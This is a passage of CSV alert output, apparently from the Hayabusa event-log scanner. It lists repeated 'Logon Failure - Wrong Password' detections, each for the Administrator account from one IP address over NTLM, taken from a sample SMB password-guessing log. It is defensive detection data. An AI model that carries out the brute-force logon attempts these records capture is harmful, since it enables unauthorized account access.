Type: 3 | Computer: pDYTFqeJC61Nneef | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0LNR7xCHW9x2q2qc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.578 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AE4EBj8X5IfXO8ZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BEOSGw6TjZf9GWS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.679 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UCxe24uL4A6R9kgZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.830 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8v4DcIRkx43KCIs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CY2buVupQ5oR1Cp5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.950 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f6c3MlpMEzkCVud2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.993 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2wV6op9AU4paDXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNn6aywSs67hVAO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wUa03SIX69WCIYbp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.158 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zYi4TB42B2VQm5Tr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 9mnUbGMnlrOR8Tv4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.252 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CJGMWqgmbXABdPvB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2W9BbDYgC6vhqU3o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.392 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q6DYsaih1Yhb2uOD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q4o93QpJL4pxx94q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lQf1OsHb4lpgMPbl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.525 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcJUYelneVqBQjr9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I0d6daEeIadJRbBI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SQ1hvZeT9aulbu4g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75RBCjr2eRDLhTqW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: maMlpuzhleuQHhIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.737 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AkpNfbOHUr7cY52z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:46.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R7SUyYbLPfPAGUfw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.845 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7clwftf7R0uNbqJ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.883 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IsIyPcMAPnlxJa12 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CKcyo1Ec4rs3Z2g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:46.973 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZlzKvZLO8CDotkbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.010 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EyRpYYtmD8389Yvp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t3Pg0H9Gncoyr45m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.112 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zksaaJ7Z1wuy4PMx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.154 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WdYAEdfWxLdM1rh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.195 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VyYFJRy0cxPfqDFh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.241 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Hv2Lz1h1bG6UatVR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FLKPLfEe3PpEzRNc | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZJWv7ggzCSyEznOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZUtR9CNfKMHQMd7T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.433 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6fYNHuRTqi15cRkL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DvxZHwJwrBYXlEyv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jscJTJjhKvCtDl8q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.575 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
mZEIEjcimMyHWUsp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.618 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 30OdVRH9ZATLezsR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.652 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJ1OSBVZHKmyOzj8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.694 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JanG6Q0oYpTdm9mC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.736 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PWCwDYL3T7TAdb0J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.777 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mRdyZaio1HjUKlNQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: VjiRnExy9TzZTG0R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztUyQpl8c9RoAr1j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jC23QAFM07q7cfVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:47.957 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TSM8lmdOFoDslQNa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sGZaUGAT1oXmnGLB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZMNo21pTA67pb7Go | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.091 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: EiTZCqK3m4icL1Vi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZaZ2mnoihX1Ec4di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ihm9zaXkmWklXk4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.201 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yLIZ3tlw9VlQmK28 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.249 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GVHzJHTi55NbxXYY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1FROeEnMLna2fTTH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.332 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: pio6ZZ9pV0pS2Whi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.376 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h1aD2w5U5K9ND5HV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.428 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zF8Jb4GpG4D3xn9i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.457 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edv4GwGfL156V1xe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.570 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Irvneva9RFn44iII | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dHtJFI8OL9kJylL5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.661 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F5Q4h62T77hGjhKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdSALwo9td9xUeBq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1kYfoqz1r1NuEn04 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.791 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7X400gufqdunUa8j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.825 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lLR8z7g0GY8r7a1r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.867 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QHMztrxiKBGtNqkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:51:48.905 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eBQevVhmZs5gHFD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lyQCs0PG6fGzpidu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:48.996 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnsPjnCieyoFIbJZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.052 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ku6mjVaG1lCJrAo1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VwiyVIWHOGuHzhdO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:49.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92v1rXcj5c0Lt3OF | IP Addr: 192.168.198.149 | AuthPackage: 
